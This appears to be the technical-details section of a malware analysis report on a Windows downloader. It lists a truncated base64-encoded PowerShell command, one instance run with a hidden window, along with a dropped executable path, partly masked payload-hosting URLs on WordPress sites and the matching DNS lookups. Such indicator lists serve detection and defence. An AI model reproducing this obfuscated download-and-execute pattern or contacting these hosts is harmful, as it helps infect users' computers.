Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEUASABUAEUAbABqAHUAPQAnAEQAUABHAE0AVwB5AG8AbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAFUAUgBJAHQAWQBQAFIAbwBUAGAATwBjAGAATwBMACIAIAA9AC...
- %HOMEPATH%\172.exe
- %HOMEPATH%\172.exe
- %HOMEPATH%\172.exe
- http://www.po###zzion.com/wp-content/zcek347/
- http://un####database.net/wp-content/QMqmK/
- http://ut##211.org/prototype/VAOWTSmQ/
- http://www.du###low.com/wp-content/0BmNgw0vb6ls79217572/
- DNS ASK po###zzion.com
- DNS ASK un####database.net
- DNS ASK ut##211.org
- DNS ASK du###low.com
- DNS ASK du###-homes.ae
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAEUASABUAEUAbABqAHUAPQAnAEQAUABHAE0AVwB5AG8AbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGAAZQBDAFUAUgBJAHQAWQBQAFIAbwBUAGAATwBjAGAATwBMACIAIAA9AC...' (with hidden window)